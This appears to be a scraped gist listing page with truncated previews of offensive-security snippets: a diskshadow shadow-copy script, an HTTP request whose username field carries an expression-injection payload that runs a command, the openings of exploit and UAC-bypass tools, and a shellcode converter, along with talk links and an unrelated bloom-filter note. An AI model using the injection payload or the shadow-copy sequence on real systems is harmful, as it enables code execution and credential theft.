-
namespaces - overview of Linux namespaces http://man7.org/linux/man-pages/man7/namespaces.7.html
-
mount_namespaces - overview of Linux mount namespaces
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
set context persistent nowriters | |
add volume c: alias someAlias | |
create | |
expose %someAlias% z: | |
exec scriptfile.cmd | |
delete shadows volume %someAlias% | |
reset | |
exit |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
import sys | |
import re | |
HEADERS = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0"} | |
if len(sys.argv) != 2: | |
print " Usage: python pulseversion.py <target ip/domain>" | |
sys.exit(1) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /users HTTP/1.1 | |
Host: localhost:8080 | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 164 | |
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// | |
// Ref = src | |
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf | |
// | |
// Credits: | |
// Vyacheslav Rusakov @swwwolf | |
// Tom Bonner @thomas_bonner | |
// | |
#include <Windows.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import binascii | |
import sys | |
file_name = sys.argv[1] | |
with open (file_name) as f: | |
hexdata = binascii.hexlify(f.read()) | |
hexlist = map(''.join, zip(hexdata[::2], hexdata[1::2])) | |
shellcode = '' | |
for i in hexlist: | |
shellcode += "0x{},".format(i) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
RSA 2017 DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links SessionID: HTA-W02 | |
https://www.slideshare.net/chrisgates/devoops-attacks-and-defenses-for-devops-toolchains | |
Recording of talk from CERN | |
https://indico.cern.ch/event/622483/ (click the recording button) | |
Past talks: | |
http://www.slideshare.net/KenJohnson61/aws-surival-guide |
关于bloom filter算法: http://www.cnblogs.com/heaad/archive/2011/01/02/1924195.html
参考项目:
- https://github.com/jettify/aioredis_bloom 基于asyncio的异步实现
- https://github.com/seomoz/pyreBloom 基于C语言的实现
作用:海量数据的去重,时间、空间复杂度为常量:O(K)。
原理:借助redis,维护一个BitSet(位集合)。通过bloom filter算法判断一个数据是否重复。
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import re | |
import os | |
import sys | |
import socket | |
import threading | |
from time import sleep | |
from pwn import * |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-UACBypass { | |
<# | |
.SYNOPSIS | |
Bypasses UAC on Windows 10 by abusing the SilentCleanup task to win a race condition, allowing for a DLL hijack without a privileged file copy. | |
Author: Matthew Graeber (@mattifestation), Matt Nelson (@enigma0x3) | |
License: BSD 3-Clause | |
Required Dependencies: None | |
Optional Dependencies: None |
NewerOlder